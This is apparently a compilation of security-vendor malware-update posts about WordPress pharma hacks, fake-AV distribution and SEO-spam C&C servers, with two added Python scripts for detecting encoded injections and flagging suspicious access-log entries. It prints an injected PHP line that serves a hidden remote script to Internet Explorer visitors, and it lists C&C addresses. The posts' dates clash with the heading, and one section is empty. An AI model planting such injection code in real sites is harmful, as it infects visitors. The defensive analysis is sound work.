Weekly malware update – 2010/Jan/31

Weekly malware update. You can track all updates by following our malware_updates category.

* If your site has been affected by any of these issues, contact us at support@sucuri.net or visit http://sucuri.net to get help, or if you want to share some information with us.

.co.cc malicious entries

We reported those issues a while ago (here and here), but we are still seeing a large number of sites infected. The following code is added to a javascript file:

<?php $de="HTTP_USER_AGENT";$ar=$_SERVER[$de];if(stristr($ar,"MSIE")&&stristr($ar,"Windows"))echo "Document.write(unescape('%3C%73%63%72%69%70%74%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%6F%69%77%64%64%2E%63%6F%2E%63%63%2F%34%31%22%3E%3C%2F%73%63%72%69%..74%3E'));"
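The injected line only fires for visitors whose user agent says MSIE on Windows, and the script tag it writes is hidden as a percent-encoded string inside unescape(). The following scanner is an added example, not code from the Sucuri post: it locates percent-encoded unescape() literals in a JavaScript file, decodes them, and reports any script src they would inject. The file contents and the bad-domain.co.cc hostname are constructed for the example.

```python
import re
from urllib.parse import unquote

# unescape("...") or unescape('...') whose argument is entirely percent-encoded,
# the shape of the injected document.write() shown above.
UNESCAPE_RE = re.compile(r"unescape\(\s*['\"]((?:%[0-9A-Fa-f]{2})+)['\"]\s*\)")
# A <script ... src="..."> tag inside the decoded text.
SRC_RE = re.compile(r"<script[^>]*\bsrc=['\"]([^'\"]+)['\"]", re.IGNORECASE)


def decode_unescape_payloads(js_text):
    """Return (encoded, decoded) pairs for every percent-encoded unescape() literal."""
    return [(m.group(1), unquote(m.group(1))) for m in UNESCAPE_RE.finditer(js_text)]


def injected_script_sources(js_text):
    """Return the src URLs of <script> tags hidden inside unescape() payloads."""
    urls = []
    for _, decoded in decode_unescape_payloads(js_text):
        urls.extend(SRC_RE.findall(decoded))
    return urls


def is_suspicious(js_text, suspect_suffixes=(".co.cc",)):
    """True if a hidden script src points at a host with a suspect suffix (.co.cc here)."""
    for url in injected_script_sources(js_text):
        host = re.sub(r"^https?://", "", url).split("/")[0].lower()
        if host.endswith(suspect_suffixes):
            return True
    return False


# Constructed sample: a benign file with the injection appended. The hostname is a
# made-up placeholder, not the one in the post.
HIDDEN_TAG = b'<script src="http://bad-domain.co.cc/41"></script>'
INJECTION = 'document.write(unescape("%s"));' % "".join("%%%02X" % b for b in HIDDEN_TAG)
SAMPLE_JS = "function init(){ console.log('hello'); }\n" + INJECTION + "\n"

if __name__ == "__main__":
    for url in injected_script_sources(SAMPLE_JS):
        print("hidden script src:", url)
    print("suspicious:", is_suspicious(SAMPLE_JS))
```

Because of the PHP user-agent gate, fetching the page remotely with a non-IE user agent will not show the tag at all; run the scanner over the JavaScript files on disk, where the encoded string is always present.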

With an .htaccess modification to make such code work:


Malware update: ssl-verification.net

Quick malware update: The site ssl-verification.net (nice name) is being used to distribute SEO spam and malware (the famous fake AV). We recently wrote about the domain ssl-validation, but it seems that they disabled it and are using ssl-verification instead now.

You can get details of the code being used here: 7ea73e3ac775b52b945d5b45a5abb7ad and b99003ddc4a4815bb82a39cc6af3b452

All the infected sites so far had an encoded piece of PHP code inside their index.php or footer.php (if using WordPress) and a backdoor inside a random PHP file. We found the backdoor and, by analyzing the logs, we could find the C&C IP address: 41.190.16.17.

41.190.16.17 - - [20/Oct/2010:03:35:21 -0700] "GET /img/readthat.php HTTP/1.1" 200 11204 "http://phlks.com/doors/check_all.pl?5" "Opera/9.80 (Macintosh; Intel Mac OS X; U; ru) Presto/2.2.15 Version/10.10"

What is interesting is that it seems the attackers are using http://phlks.com/doors/check_all.pl to manage their network of infected sites and according to Google, they have more than 4k sites under their control.

The malicious site is hosted at 85.17.213.243, so our suggestion for hosting companies: block this IP.


Having issues with malware? Sign up at http://sucuri.net and we will get it all sorted out.

NASA web site hacked and serving malware/spam

Some sites under NASA’s Jet Propulsion Lab ( http://jpl.nasa.gov/ ) have been hacked and are being used in the infamous blackhat SEO spam network. Not only that, but they are also serving malware to unsuspecting users.

The sites in question are http://ki.jpl.nasa.gov/, http://aviris.jpl.nasa.gov/ and a few others. Most of these malicious pages are well hidden in the site, for example at http://aviris.jpl.nasa.gov/cgi/ch/.cache/levitra-drug-impotence:

[Screenshot: NASA with spam]

You can also search on google for “cialis canada inurl:nasa.org” to find a few more pages and sites infected:


Rail Europe trying to sell me Amoxicillin – Pharma hack

I was looking to buy some Amoxicillin online today and didn’t want to get a prescription. So I went to Google and searched for it. Interestingly enough, Rail Europe ( http://blog.raileurope.com ) was the first result.

Ok, so I’m kidding, I was not searching for Amoxicillin. I was however being truthful about Rail Europe being hacked with the infamous Blackhat SEO Spam (pharma) technique.

Infecting sites with ads for medicine to treat infections, how awesome is that?

[Screenshot: Pharma hack]


Blackhat SEO Spam C&C: wseow and seotoos up to no good!

We have been tracking these Blackhat SEO Spam C&C (command and control) servers for a while and thought it would be a good time to expose some of the details.

They have been actively trying to exploit blogs using old versions of WordPress to use them as part of their spam network.

IP addresses used:
94.75.221.117
94.75.221.118

Malware being used:
On the sites we’ve analyzed so far, wp-settings.php and index.php are hacked to load the SPAM, and to serve as a backdoor to the attackers.

This is the code added to the bottom of wp-settings.php:

http://sucuri.net/?page=tools&title=blacklist&detail=fe7b3ef5bba0429150672dfea5a66109


Success Magazine Blog Hit With Malware

We were analyzing some hacked sites today and one of them was full of SPAM. After some digging, we found that it was loading the Blackhat SEO Spam from blog.success.com (the official blog of Success Magazine).

After a quick scan of their blog, we can see that it is being used to load all sorts of Pharma goodness:

[Screenshot: Success spam]


More spam: Google-traffic-analytics.com C&C server

We have been tracking another wave of SPAM that is affecting many popular web sites. What is interesting is that all of them have been controlled by just one site: http://www.google-traffic-analytics.com.

And when this site went down, guess what is showing up on Google:



Pharma hack and their C&C (Command & control) server

A large portion of the sites Sucuri has been fixing in recent weeks stem from infections caused by the infamous Pharma Hack. We posted a detailed document explaining how to fix it and clean up the attack:

Understanding and cleaning the pharma hack on WordPress

One thing we’ve noticed on all sites affected so far is that all of them have been receiving commands from this IP address: 94.76.241.4 (curingin.com).

If your site has been affected you can double check your access.log for these entries:

94.76.241.4 - - [31/Jul/2010:06:07:59 -0700] "POST /wp-content/themes/classic/sidebar.php HTTP/1.1" 500 374 "-" "-"
94.76.241.4 - - [31/Jul/2010:06:08:30 -0700] "POST /wp-content/themes/classic/sidebar.php HTTP/1.1" 500 447 "-" "-"
94.76.241.4 - - [31/Jul/2010:11:06:55 -0700] "POST /wp-content/themes/classic/sidebar.php HTTP/1.1" 500 444 "-" "-"
94.76.241.4 - - [30/Jul/2010:12:57:41 -0700] "POST /wp-content/themes/classic/comments.php HTTP/1.1" 200 202 "-" "-"
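The entries above, and the ssl-verification.net entry quoted earlier on this page, share two tell-tale shapes: a request from an address already tied to a C&C server, and a POST to a PHP file under wp-content/themes with no referer and no user agent. The script below is an added example, not part of the Sucuri posts: it parses combined-format access.log lines and flags either pattern, so the same check can be run over a full log rather than by eye. The sample log is constructed; the 94.76.241.4 and 41.190.16.17 addresses and the phlks.com host are the ones named on this page, and the other addresses are RFC 5737 documentation ranges.

```python
import re
from collections import Counter

# Combined log format: ip ident user [time] "method path proto" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# Addresses and the panel host named in the posts on this page.
KNOWN_C2_IPS = {"94.76.241.4", "41.190.16.17"}
KNOWN_C2_HOSTS = ("phlks.com",)


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def is_blind_theme_post(entry):
    """POST to a PHP file under wp-content/themes with empty referer and user agent."""
    return (entry["method"] == "POST"
            and entry["path"].startswith("/wp-content/themes/")
            and entry["path"].split("?")[0].endswith(".php")
            and entry["referer"] == "-"
            and entry["agent"] == "-")


def referer_host(entry):
    """Hostname part of the referer, lower-cased ('-' when absent)."""
    return re.sub(r"^https?://", "", entry["referer"]).split("/")[0].lower()


def triage(lines):
    """Return (flagged entries with reasons, Counter of flagged requests per IP)."""
    flagged = []
    for line in lines:
        e = parse_line(line)
        if e is None:
            continue
        reasons = []
        if e["ip"] in KNOWN_C2_IPS:
            reasons.append("known C&C IP")
        if referer_host(e).endswith(KNOWN_C2_HOSTS):
            reasons.append("referer from known C&C host")
        if is_blind_theme_post(e):
            reasons.append("blind POST to theme PHP")
        if reasons:
            e["reasons"] = reasons
            flagged.append(e)
    return flagged, Counter(e["ip"] for e in flagged)


# Constructed sample log: the first and last lines mirror entries quoted in the
# posts, the others use documentation addresses (RFC 5737).
SAMPLE_LOG = [
    '94.76.241.4 - - [31/Jul/2010:06:07:59 -0700] "POST /wp-content/themes/classic/sidebar.php HTTP/1.1" 500 374 "-" "-"',
    '203.0.113.5 - - [31/Jul/2010:06:10:00 -0700] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [31/Jul/2010:06:11:00 -0700] "POST /wp-content/themes/classic/comments.php HTTP/1.1" 200 202 "-" "-"',
    '41.190.16.17 - - [20/Oct/2010:03:35:21 -0700] "GET /img/readthat.php HTTP/1.1" 200 11204 "http://phlks.com/doors/check_all.pl?5" "Opera/9.80 (Macintosh; Intel Mac OS X; U; ru) Presto/2.2.15 Version/10.10"',
]

if __name__ == "__main__":
    flagged, per_ip = triage(SAMPLE_LOG)
    for e in flagged:
        print(e["ip"], e["method"], e["path"], "->", ", ".join(e["reasons"]))
    print(dict(per_ip))
```

The blind-POST rule is deliberately not tied to the known addresses: a 500 or 200 on a POST to a theme file that browsers never post to is worth a look whoever sends it, and it is how you would spot the next C&C address before it is published anywhere.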

This IP is hosted at Blueconnex and, even after tons of abuse reports (from multiple sources), they’ve sat idle.

$ whois 94.76.241.4
route: 94.76.192.0/18
descr: Blueconnex Networks Ltd
origin: AS29550

